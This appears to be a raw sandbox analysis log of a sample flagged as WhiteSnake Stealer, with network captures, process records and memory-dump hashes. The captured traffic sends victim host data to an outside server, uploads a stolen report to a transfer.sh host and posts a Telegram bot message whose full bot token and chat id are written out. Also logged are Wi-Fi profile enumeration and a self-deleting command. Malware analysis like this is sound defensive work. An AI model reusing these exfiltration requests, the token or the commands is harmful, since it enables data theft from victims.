                                                                                                                                          Oct 30, 2024 08:12:45.739662886 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:45.739676952 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.576720953 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.576806068 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:46.579348087 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:46.579361916 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.579644918 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.590341091 CET4969980192.168.2.7208.95.112.1
                                                                                                                                          Oct 30, 2024 08:12:46.622126102 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:46.654304028 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:46.699333906 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.913985014 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.914084911 CET44363170149.154.167.220192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:46.914132118 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:46.915333986 CET63170443192.168.2.7149.154.167.220
                                                                                                                                          Oct 30, 2024 08:12:48.997096062 CET4969980192.168.2.7208.95.112.1
                                                                                                                                          Oct 30, 2024 08:12:53.809663057 CET4969980192.168.2.7208.95.112.1
                                                                                                                                          Oct 30, 2024 08:13:03.419018030 CET4969980192.168.2.7208.95.112.1
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Oct 30, 2024 08:11:03.839150906 CET5386053192.168.2.71.1.1.1
                                                                                                                                          Oct 30, 2024 08:11:03.848479986 CET53538601.1.1.1192.168.2.7
                                                                                                                                          Oct 30, 2024 08:11:52.910669088 CET5349332162.159.36.2192.168.2.7
                                                                                                                                          Oct 30, 2024 08:11:53.533575058 CET53589521.1.1.1192.168.2.7
                                                                                                                                          Oct 30, 2024 08:12:45.724031925 CET6317353192.168.2.71.1.1.1
                                                                                                                                          Oct 30, 2024 08:12:45.731437922 CET53631731.1.1.1192.168.2.7
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Oct 30, 2024 08:11:03.839150906 CET192.168.2.71.1.1.10x2801Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                          Oct 30, 2024 08:12:45.724031925 CET192.168.2.71.1.1.10x4c5bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Oct 30, 2024 08:11:03.848479986 CET1.1.1.1192.168.2.70x2801No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                          Oct 30, 2024 08:12:45.731437922 CET1.1.1.1192.168.2.70x4c5bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                          • api.telegram.org
                                                                                                                                          • ip-api.com
                                                                                                                                          • 41.216.183.9:8080
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.749699208.95.112.1806500C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Oct 30, 2024 08:11:03.861440897 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                                                                                          Host: ip-api.com
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Oct 30, 2024 08:11:04.458051920 CET199INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 30 Oct 2024 07:11:03 GMT
                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                          Content-Length: 29
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          X-Ttl: 60
                                                                                                                                          X-Rl: 44
                                                                                                                                          Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0a
                                                                                                                                          Data Ascii: United States173.254.250.78


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.74970041.216.183.980806500C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Oct 30, 2024 08:11:04.940112114 CET254OUTPOST /sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1
                                                                                                                                          Host: 41.216.183.9:8080
                                                                                                                                          Content-Length: 123400
                                                                                                                                          Expect: 100-continue
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.763169209.38.221.18480806500C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Oct 30, 2024 08:12:44.503120899 CET150OUTPUT /yLWFd_user%40927537_report.wsr HTTP/1.1
                                                                                                                                          Host: 209.38.221.184:8080
                                                                                                                                          Content-Length: 123400
                                                                                                                                          Expect: 100-continue
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Oct 30, 2024 08:12:45.348720074 CET25INHTTP/1.1 100 Continue
                                                                                                                                          Oct 30, 2024 08:12:45.713327885 CET390INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Server: Transfer.sh HTTP Server
                                                                                                                                          X-Made-With: <3 by DutchCoders
                                                                                                                                          X-Served-By: Proudly served by DutchCoders
                                                                                                                                          X-Url-Delete: http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user@927537_report.wsr/fya15tfswvEaVoLj6wJL
                                                                                                                                          Date: Wed, 30 Oct 2024 07:12:45 GMT
                                                                                                                                          Content-Length: 71
                                                                                                                                          Data Raw: 68 74 74 70 3a 2f 2f 32 30 39 2e 33 38 2e 32 32 31 2e 31 38 34 3a 38 30 38 30 2f 49 38 35 4f 41 7a 6a 37 4f 70 2f 79 4c 57 46 64 5f 66 72 6f 6e 74 64 65 73 6b 40 39 32 37 35 33 37 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                                                          Data Ascii: http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user@927537_report.wsr


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.763170149.154.167.2204436500C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-30 07:12:46 UTC901OUTGET /bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-10-30 07:12:46 UTC389INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Wed, 30 Oct 2024 07:12:46 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 1096
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2024-10-30 07:12:46 UTC1096INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 32 32 38 30 35 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 6f 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 68 69 74 65 6c 6f 67 67 65 72 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 37 33 34 37 32 38 36 35 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 6f 76 69 74 6f 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 44 6f 76 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 6f 76 69 74 6f 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 37 32 33 36 36 2c 22 74 65 78 74 22
                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":40,"from":{"id":7722280561,"is_bot":true,"first_name":"logger","username":"whiteloggerbot"},"chat":{"id":7734728653,"first_name":"Dovitoo","last_name":"Dovo","username":"Dovitoo","type":"private"},"date":1730272366,"text"


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:03:11:00
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                          Imagebase:0x2b0000
                                                                                                                                          File size:315'904 bytes
                                                                                                                                          MD5 hash:D5B8AC0D80C99E7DDA0D9DF17C159F3D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:03:11:00
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                                                                          Imagebase:0x26b64c30000
                                                                                                                                          File size:228'440 bytes
                                                                                                                                          MD5 hash:ECC94919C7D1385D489961B21AF97328
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_WhiteSnake, Description: Yara detected WhiteSnake Stealer, Source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:03:11:01
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                          Imagebase:0x7ff615170000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:03:11:01
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:03:11:01
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:chcp 65001
                                                                                                                                          Imagebase:0x7ff61a3a0000
                                                                                                                                          File size:14'848 bytes
                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:netsh wlan show profiles
                                                                                                                                          Imagebase:0x7ff708790000
                                                                                                                                          File size:96'768 bytes
                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                                                          Imagebase:0x7ff7a7520000
                                                                                                                                          File size:36'352 bytes
                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                          Imagebase:0x7ff615170000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:chcp 65001
                                                                                                                                          Imagebase:0x7ff61a3a0000
                                                                                                                                          File size:14'848 bytes
                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:netsh wlan show networks mode=bssid
                                                                                                                                          Imagebase:0x7ff708790000
                                                                                                                                          File size:96'768 bytes
                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:03:11:02
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:findstr "SSID BSSID Signal"
                                                                                                                                          Imagebase:0x7ff7a7520000
                                                                                                                                          File size:36'352 bytes
                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:24
                                                                                                                                          Start time:04:22:33
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                                                                          Imagebase:0x7ff615170000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:25
                                                                                                                                          Start time:04:22:33
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:26
                                                                                                                                          Start time:04:22:33
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:chcp 65001
                                                                                                                                          Imagebase:0x7ff61a3a0000
                                                                                                                                          File size:14'848 bytes
                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:27
                                                                                                                                          Start time:04:22:33
                                                                                                                                          Start date:30/10/2024
                                                                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:timeout /t 3
                                                                                                                                          Imagebase:0x7ff6ad340000
                                                                                                                                          File size:32'768 bytes
                                                                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Reset < >
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: pq$$q$$q
                                                                                                                                            • API String ID: 0-1753540237
                                                                                                                                            • Opcode ID: 90dc37b28930b020345c85e749f69508bf403fff534522806c5a106dba8059a2
                                                                                                                                            • Instruction ID: eddcb85d897cff9153687160b40f4b1e061b463eb526c9fda9b6d2889081e161
                                                                                                                                            • Opcode Fuzzy Hash: 90dc37b28930b020345c85e749f69508bf403fff534522806c5a106dba8059a2
                                                                                                                                            • Instruction Fuzzy Hash: 4591F4766002049FCB09DFA4C944E69BBB2FF8D314B2A8195E60A9F376C732EC55DB41
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8q
                                                                                                                                            • API String ID: 0-4083045702
                                                                                                                                            • Opcode ID: fe2dc19a6697b63d3ae4fb30cca04038d4a58248f8a7b849406b0cfc4cfa2d4a
                                                                                                                                            • Instruction ID: 4605c253ec356fe70a23977fa6d52fdd22db27b5e6bcba747d94947b2ca83df7
                                                                                                                                            • Opcode Fuzzy Hash: fe2dc19a6697b63d3ae4fb30cca04038d4a58248f8a7b849406b0cfc4cfa2d4a
                                                                                                                                            • Instruction Fuzzy Hash: 3D01F235B082808FCB149B79A844E3E7FB5BBC9310729806EE50ACB361C9218C419761
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8q
                                                                                                                                            • API String ID: 0-4083045702
                                                                                                                                            • Opcode ID: 6c9bde4dea273bb365c395287f4221331a514a2d4588065159bfb7497de403d3
                                                                                                                                            • Instruction ID: d4194789d7248e041f33ebd82ffd4c1e5d8389e038b923ae53fe8882f7143ebc
                                                                                                                                            • Opcode Fuzzy Hash: 6c9bde4dea273bb365c395287f4221331a514a2d4588065159bfb7497de403d3
                                                                                                                                            • Instruction Fuzzy Hash: 62F0C235B042009F8B149BA9A844D3E7AFAFBCC71533A846AE10ACB321CD21DC4197A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e1b906d4c6d8eb914b429e13b7fb067bf0515e30072e0c159b9a31459415f798
                                                                                                                                            • Instruction ID: 04a7e9aa86df1c12fecdd7f2c8cc7d2511ffb66fc1dc040c5e24dae45f4586a5
                                                                                                                                            • Opcode Fuzzy Hash: e1b906d4c6d8eb914b429e13b7fb067bf0515e30072e0c159b9a31459415f798
                                                                                                                                            • Instruction Fuzzy Hash: 8E219D71C4E3C4AFC713DB79D86558A7FB0AE47210B1644DBC082CF1A3D635894ADB92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a8f48f7b0afc2a334d8ef59742183b51bf7364e81adfe2ab2ad064a60631d4c7
                                                                                                                                            • Instruction ID: 7a784bbb41e9eec6b640468aa7747dce0772815be7e549988ce251cd30e07356
                                                                                                                                            • Opcode Fuzzy Hash: a8f48f7b0afc2a334d8ef59742183b51bf7364e81adfe2ab2ad064a60631d4c7
                                                                                                                                            • Instruction Fuzzy Hash: 05612A757041109FCB19DB28D850A6EBBB2EFC9314B2989A9D41ACB356DB32EC43C791
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1155506c20cf64030cdd202f378a819b41179dfc35ce3ea9789a2629b14ce7f0
                                                                                                                                            • Instruction ID: 9168c98c5136ec6ebfdf0e5ab7799571b15c9e23f101804839274475f0ed1f66
                                                                                                                                            • Opcode Fuzzy Hash: 1155506c20cf64030cdd202f378a819b41179dfc35ce3ea9789a2629b14ce7f0
                                                                                                                                            • Instruction Fuzzy Hash: 6A410B78D04208EFCB54DFA8D894E9DBBF1BF48304F209659E412AB369DB70A885CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c0fa2a8f705a157f40809fe175899b821cb908b44e0de49f8d53764170cefcc4
                                                                                                                                            • Instruction ID: 153b52caaf6d141dcf06b53f3554e54ad9e9a22bf184d8f4b80ef11c559857a6
                                                                                                                                            • Opcode Fuzzy Hash: c0fa2a8f705a157f40809fe175899b821cb908b44e0de49f8d53764170cefcc4
                                                                                                                                            • Instruction Fuzzy Hash: 1041D878910208EFCB54DFA8E894A9DBBF1FF48704F209659E411AB368DB70A985CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a5d1f2d22c26fe4b7c49c1b3ee31b31827015086e6cf4a1d8fe55f754a6d433d
                                                                                                                                            • Instruction ID: 1a29681c5d9e0613bc9337137feb633ac3cb5c89bcd100f2c564ed96a16ba2df
                                                                                                                                            • Opcode Fuzzy Hash: a5d1f2d22c26fe4b7c49c1b3ee31b31827015086e6cf4a1d8fe55f754a6d433d
                                                                                                                                            • Instruction Fuzzy Hash: 7E2160787091409FC355D728D960E2A7BF29BC931472985AED41ACB3D6DE26DC03C782
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fa183498867d98e9356e4ac35f3a351d9ae57fb48f6390ade0b684df1b242077
